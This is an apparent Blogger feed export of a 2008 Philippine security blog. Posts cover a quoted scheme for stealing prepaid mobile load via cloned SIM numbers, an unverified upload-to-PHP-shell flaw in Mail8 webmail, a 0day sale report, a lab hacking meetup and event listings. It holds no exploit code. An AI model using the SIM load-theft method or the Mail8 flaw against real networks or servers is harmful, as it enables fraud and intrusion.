Hacking</title><content type='html'>I found all this information at &lt;a href="http://pinoymobiles.blogspot.com/2008/10/globe-network-hacking.html"&gt;http://pinoymobiles.blogspot.com/2008/10/globe-network-hacking.html&lt;/a&gt;. I don't know if this still works.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"Paano nangyayari ang bagay na ito?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Simple lang at di ko na ipapaliwanag kung paano gawin baka may ibang gumaya at magsamantala.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;I was one of the hacker/abuser dahil akala ko walang apektadong tao at simpleng glitch lamang&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ito hanggang sa may nagtext sa akin na "huhuhuh ang load ko, bakit na share sa iyo" at binalik&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ko naman dahil malay ko pang ang taong iyon eh last money na ang pinang-load niya.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Ito ang mga bagay na ginagamit ng mga hackers/abusers/parasites:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;1-3 Globe Simcard&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;1st (host/passer)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;2nd (Leecher)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;3rd (Final Receiver)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;1 to 3 Mobile Phones&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Smart Network&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Network settings&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Globe's 222"...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"How it works?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;For example ang # ni sim 1 is: 0916 xxx xxx1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;then gagawin niya ang settings&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;magbabal inquiry ng 2-3x&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ang unang bal niya is ung original balance nya, sabihin na nating 0.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ikalawang/bal niya ay magiging 1-99999 depende sa mahuhuli ng network na sim.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;now na nagawa na ang settings mag-iiba na ang # ni sim # 1 and magiging # niya ay ang nahuli ng network i.e 0927 xxx xxx3&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;ung load nung nahuling sim card ay pwede ng itransfer sa Sim # 2. then para maiwasan ni Sim # 2 na matrace ng original owner ng nabiktimang simcard epapasa naman ni sim # 2 kay Sim # 3 ang nanakaw na load.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Kung naka pin ang share a load mo, safe ang load mo. Pero ang call hindi. Now kapag naka activate ang barring + Fixed Dialling, once na napili ng network ang Sim mo, May makikita kang message na Sim Registration Failed, Phone will now Restart. Talo ang Hacker!"&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-8556387563983377338?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/8556387563983377338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=8556387563983377338' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8556387563983377338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/8556387563983377338'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/12/globe-network-hacking.html' title='Globe Network Hacking'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7363992594632945064</id><published>2008-12-13T11:32:00.002+08:00</published><updated>2008-12-13T11:41:21.997+08:00</updated><title type='text'>The 0day will cost you....</title><content type='html'>$15,ooo apparently.&lt;br /&gt;&lt;br /&gt;This is for the  Internet Explorer XML parsing overflow. There's a nice analysis &lt;a href="http://www.breakingpointsystems.com/community/blog/patch-tuesdays-and-drive-by-sundays"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.pcworld.com/article/155312/.html"&gt;http://www.pcworld.com/article/155312/.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Information on the vulnerability was allegedly sold in November on the underground back market for US$15,000. Earlier this month, the exploit was sold second or third hand for $650, said iDefense, citing knownsec."&lt;br /&gt;&lt;br /&gt;Kinda what I posted &lt;a href="http://archives.free.net.ph/message/20081013.093235.8ac1bb04.en.html"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7363992594632945064?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7363992594632945064/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7363992594632945064' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7363992594632945064'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7363992594632945064'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/12/0day-will-cost-you.html' title='The 0day will cost you....'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7012001690349489312</id><published>2008-12-09T23:01:00.003+08:00</published><updated>2008-12-09T23:18:05.231+08:00</updated><title type='text'>Mail8 Vulnerability</title><content type='html'>Mail8 is a simple webmail application written in PHP which can be used and integrated in any Email Server supporting IMAP protocol. It's released by &lt;a href="http://www.8layertech.com/"&gt;8Layer&lt;/a&gt;. I became aware of them when I saw this &lt;a href="http://archives.free.net.ph/thread/20081208.035044.1d9cc7cd.en.html"&gt;thread&lt;/a&gt; on the Linuxjobs.ph mailing list. I &lt;a href="http://sourceforge.net/project/showfiles.php?group_id=236873"&gt;downloaded&lt;/a&gt; Mail8 and had a quick look at it. compose.php doesn't seem to have any session control and allows php files to be uploaded to the attachments folder. So quite easy to upload a php shell and get command execution (depending on the servers' php setup).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;*I need to have someone verify the flaw since I was in a hurry when I did this and I have limited access to a webserver nowadays. I also think attach.php can be called directly anyways =)&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7012001690349489312?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7012001690349489312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7012001690349489312' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7012001690349489312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7012001690349489312'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/12/mail8-vulnerability.html' title='Mail8 Vulnerability'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5266654680618291478</id><published>2008-11-24T02:39:00.005+08:00</published><updated>2008-11-24T04:25:42.853+08:00</updated><title type='text'>Put Up OR Shut Up (PUORSU) Conference</title><content type='html'>* I'm calling it PUORSU rather than PUOSU because I find it easier to read as *pursue*, as in &lt;span style="font-style: italic;"&gt;to pursue knowledge&lt;/span&gt; =) *&lt;br /&gt;&lt;br /&gt;The conference was held on Nov. 20, 2008 in a cafe located near East Ave, QC. The discussion regarding the final date and venue was moved off the &lt;a href="http://archives.free.net.ph/thread/20081112.033051.51d23a4a.en.html"&gt;PLUG list&lt;/a&gt; since drexx wanted to keep the number of attendees to a minimum. Confirmation as to whether the event would push through was rather sketchy since the event was so informal that the general attitude seemed to be  "just go there and we'll see". Not that big a deal if you were &lt;span style="font-style: italic;"&gt;not&lt;/span&gt; planning on skipping work and travelling quite a distance to go there =)&lt;br /&gt;&lt;br /&gt;I got to the venue around 10:20 AM. Philip and Joebert were there ahead of me. Both had their laptops open and were apparently already playing with Metasploit. We basically just talked a bit while we waited for the others. After about 30 minutes we started getting apprehensive that the others were either not going to come or had gotten lost (the number on the address emailed to us was wrong). We debated whether to go to Robinson's for some free wi-fi or to setup an ad-hoc network so we can practice on the VM's Philip had brought. We settled going for the ad-hoc network. We had a bit of delay trying to setup philip's laptop as the host for the network. I made the discovery that wicd doesn't correctly configure ad-hoc on my laptop. I was going for the manual setup when Jumbz arrived.&lt;br /&gt;&lt;br /&gt;He brought some needed hardware, a wifi AP, network cables, power cords, and the big racktype-like server. Jumbz btw is the sponsor for the venue, one of his siblings own the place. He sponsored for the food of which there were lots and quite tasty. He was still setting up his equipment when Drexx arrived. Drexx brought the server he promised and on which we later ran the VM's we brought. He came in talking about some forensics case he was working on and it sparked our interest.&lt;br /&gt;&lt;br /&gt;After finalizing the equipment setup we started the main part of the conference. I learned a very cool trick on how to make a switch behave like a hub. I still can't believe that switches have a fundamental flaw like that, I asked drexx if it was vendor specific and he said no, it affected all switches.&lt;br /&gt;&lt;br /&gt;Drexx gave an overview of Nmap, the various switches and how they affected the scan.  Oh, and you could tell he was a network engineer the way he insisted on counting packet sizes to prove a point =)&lt;br /&gt;&lt;br /&gt;Lunch Break. Like I said lots of food, more than we could eat. Jumbz and I talked a bit outside during a yosi break. He has a beowulf cluster built and he said that the server he brought was built with COTS stuff. He's also the type of guy who compiles common software from source =)&lt;br /&gt;&lt;br /&gt;Moving on, we loaded a VM, the Win 2k image I had brought with me. It basically got hammered as we all tried to exploit it. We just used metasploit since joebert and philip were still learning how to use it. Joebert picks up real fast and even improvised a script on the fly which throws all available exploits against a target. We got a kick out of the vnc payloads, myself more so since I have'nt played with that payload before.&lt;br /&gt;&lt;br /&gt;We also loaded up some more VM's. The 2 solaris images didn't work out, one of them didn't boot properly while the other had its root password forgotten so that we were unable to configure its network interface. Drexx had an XP SP2 image which I got shell access to. He had some honeypot software running on it =) There was also the "Nagios" VM. I claimed I could get root acces to it and I did. Not by using an exploit but by using the overheard password =) Isn't that part of network security, protect your passwords? =) Jumbz apparently  has win2k3 installed on his server but I didn't attack it because I didn't know it was declared as a target.&lt;br /&gt;&lt;br /&gt;Snack time. More food. There was so much food that we were unable to eat all of it =)&lt;br /&gt;&lt;br /&gt;There were a number of interesting discussions that took place during the day. The topics included RNG's causing weak tokens, pentest rates, sql injection, a joomla vuln which affected philip's server, virtualization with all its present forms, vmware, virtualbox, openvz, using DEBUG to write an exe to disk, that well-known pentest team using nessus and charging an unbelievable amount for it, chinese hacking the US, drexx hacking a spammers' email account, etc.&lt;br /&gt;&lt;br /&gt;*Misc stuff * I found out that banks here doesn't have a central body approved set of compliance and regulations which is probably why a lot of them use obsolete win2k's in their internal network. I have a feeling audits and pentest will be a moneymaker if they ever get one =) I got to try out smbshell the precompiled nasl script while the others were practising with metasploit. I brought an eee which ran all my sofware and scripts perfectly, except for nessus which I didn't even try out once during the con since I know it's such a memory hog.  I found out that an open flame food warmer will get people to sniff their hardware =)&lt;br /&gt;&lt;br /&gt;That was basically it. Not bad for an introductory meetup =). I got picked to present about w3af, of which I know nothing about, next meeting. Future sessions would involve  wardriving, OWASP stuff, more metasploit stuff, and more food =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5266654680618291478?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5266654680618291478/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5266654680618291478' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5266654680618291478'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5266654680618291478'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/11/put-up-or-shut-up-puorsu-conference.html' title='Put Up OR Shut Up (PUORSU) Conference'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1882546288232811790</id><published>2008-11-23T17:22:00.003+08:00</published><updated>2008-11-23T17:30:32.146+08:00</updated><title type='text'>Ethical Hacking Seminar</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="http://tpcevents.org/"&gt;TPCEvents.org&lt;/a&gt; will be holding a seminar on Ethical Hacking with&lt;/span&gt; &lt;/span&gt;&lt;span style="font-weight: bold;font-family:Verdana,Arial,Helvetica,sans-serif;font-size:100%;"  &gt;Joebert Jacaba &lt;/span&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;&lt;span style="font-size:100%;"&gt;as speaker. Joebert is one of the guys I met during the recently held &lt;a href="http://wehavedayjobs.blogspot.com/2008/11/upcoming-security-cons-gatherings-in.html"&gt;PUORSU conference&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;table align="center" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td colspan="3" width="386"&gt;&lt;strong&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Ethical Hacking&lt;/span&gt;                 &lt;input name="seminarID" value="102" size="32" type="hidden"&gt;                 &lt;input name="userID" value=" " size="32" type="hidden"&gt;                 &lt;input name="status" value="reserved" size="32" type="hidden"&gt;                           &lt;input name="dateinserted" value=" 2008-11-23 17:08:03" size="32" type="hidden"&gt;           &lt;/strong&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3" height="20"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Date: Nov 30, 2008 - Sunday&lt;/span&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Time: 1:00 pm to 6:00pm&lt;/span&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Speaker: Joebert Jacaba&lt;/span&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Description:&lt;p&gt;I: Introduction to Ethical Hacking&lt;br /&gt;Philippine E-Commerce Law&lt;br /&gt;II: Footprinting&lt;br /&gt;III: Scanning&lt;br /&gt;IV: Enumeration&lt;br /&gt;V: System Hacking&lt;br /&gt;VI: Trojans and Backdoors&lt;br /&gt;VII: Sniffers&lt;br /&gt;VIII: &lt;span id="\&amp;quot;lw_1226992176_0\&amp;quot;" class="\&amp;quot;yshortcuts\&amp;quot;" style="" 1px="" dashed="" transparent="" none="" repeat="" scroll=""&gt;Denial of Service&lt;/span&gt;&lt;br /&gt;IX: &lt;span id="\&amp;quot;lw_1226992176_1\&amp;quot;" class="\&amp;quot;yshortcuts\&amp;quot;" style="" 1px="" dashed="" transparent="" none="" repeat="" scroll=""&gt;Social Engineering&lt;/span&gt;&lt;br /&gt;X: Session Hijacking&lt;br /&gt;XI: Hacking Web Servers&lt;br /&gt;XII: Web Application Vulnerabilities&lt;br /&gt;XIII: Web Based Password Cracking&lt;br /&gt;Techniques&lt;br /&gt;XIV: SQL Injection&lt;br /&gt;XV: Hacking Wireless Networks&lt;br /&gt;XVI: Viruses&lt;br /&gt;XVII: Evading IDS, Firewalls and Honey pots&lt;br /&gt;XVIII: Buffer Overflows&lt;br /&gt;XIX: Cryptography&lt;/p&gt;&lt;/span&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Venue: Roofdeck 23 Capinpin Place Capinpin St. San Antonio Pasig&lt;/span&gt;&lt;/td&gt;         &lt;/tr&gt;         &lt;tr&gt;           &lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11;"  &gt;Fee: 350&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1882546288232811790?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1882546288232811790/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1882546288232811790' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1882546288232811790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1882546288232811790'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/11/ethical-hacking-seminar.html' title='Ethical Hacking Seminar'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8395851488458297120</id><published>2008-11-13T23:02:00.007+08:00</published><updated>2008-11-21T09:46:58.921+08:00</updated><title type='text'>Upcoming Security Cons / Gatherings in the Philippines</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="color: rgb(255, 0, 0);" href="http://www.defconph.org/index.php?xml_id=events"&gt;Defconph Beer Talk&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.defconph.org/images/beertalk.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 600px; height: 115px;" src="http://www.defconph.org/images/beertalk.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;  &lt;div align="center"&gt; &lt;table width="638" border="2" cellspacing="0"&gt; &lt;tbody&gt;&lt;tr valign="top"&gt;&lt;td colspan="3"&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;b&gt;SATURDAY     DECEMBER 20  2008&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;1:00PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;1:10PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Welcome Address&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;1:10PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;1:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Introduction of DefconPH&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;1:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;2:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;a href="http://www.defconph.org/index.php?xml_id=events#googlehack"&gt;Google Hacking + Live Demo&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;2:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;2:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Q &amp;amp; A&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;2:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;3:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;a href="http://www.defconph.org/index.php?xml_id=events#networkrecon"&gt;Network Reconnaissance + Live Demo&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;3:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;3:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Q &amp;amp; A&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;3:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;4:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;a href="http://www.defconph.org/index.php?xml_id=events#infosec"&gt;Information Security: An Overview&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;4:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;4:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Q &amp;amp; A&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;4:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;&lt;a href="http://www.defconph.org/index.php?xml_id=events#tacticalattack"&gt;Tactical Attack Vectors + Live Demo&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:20PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Q &amp;amp; A&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:30PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:45PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Closing Remark by the Founder of DefconPH&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr valign="top"&gt;&lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;5:45PM&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;onwards&lt;/span&gt;&lt;/td&gt;   &lt;td&gt;&lt;span style=";font-family:Verdana;font-size:85%;"  &gt;Professional Networking + Group Discussion    + More Beers&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;br /&gt;A precursor to a full-blown defcon event here in the Philippines. Only trouble is that it's going to be held in Cebu.&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Put-up-or-shut-up Conference&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;(PUORSUC)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;An informal gathering organized by members of the PLUG (Phil. Linux Users Group) mailing list. Details still to be announced.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://archives.free.net.ph/thread/20081112.033051.51d23a4a.en.html"&gt;http://archives.free.net.ph/thread/20081112.033051.51d23a4a.en.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;a style="color: rgb(255, 0, 0);" href="http://hackacon.com/sessions.html"&gt;&lt;span&gt;Hackacon Cebu&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:14;"  &gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;December 5, 2008&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;p class="MsoNoSpacing" style="color: rgb(0, 0, 0); text-align: left;"&gt;&lt;span style="font-size:100%;"&gt;For only       Php3,995.00/person&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt;       &lt;/div&gt;&lt;p class="MsoNoSpacing" style="color: rgb(0, 0, 0); text-align: left;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:10;"&gt;Inclusive       of Certificate, Handout, AM/PM Buffet Snack and Buffet Lunch&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt;       &lt;/div&gt;&lt;p class="MsoNoSpacing" style="color: rgb(0, 0, 0); text-align: left;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:9;"&gt;+ FREE GK Souvenir Shirt &amp;amp; Other Sponsor       Give-aways&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: left;"&gt;       &lt;/div&gt;&lt;p style="text-align: left;" class="MsoNoSpacing"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:10;"&gt;Venue&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:10;" &gt;: &lt;/span&gt;&lt;strong style="color: rgb(0, 0, 0);"&gt;&lt;span 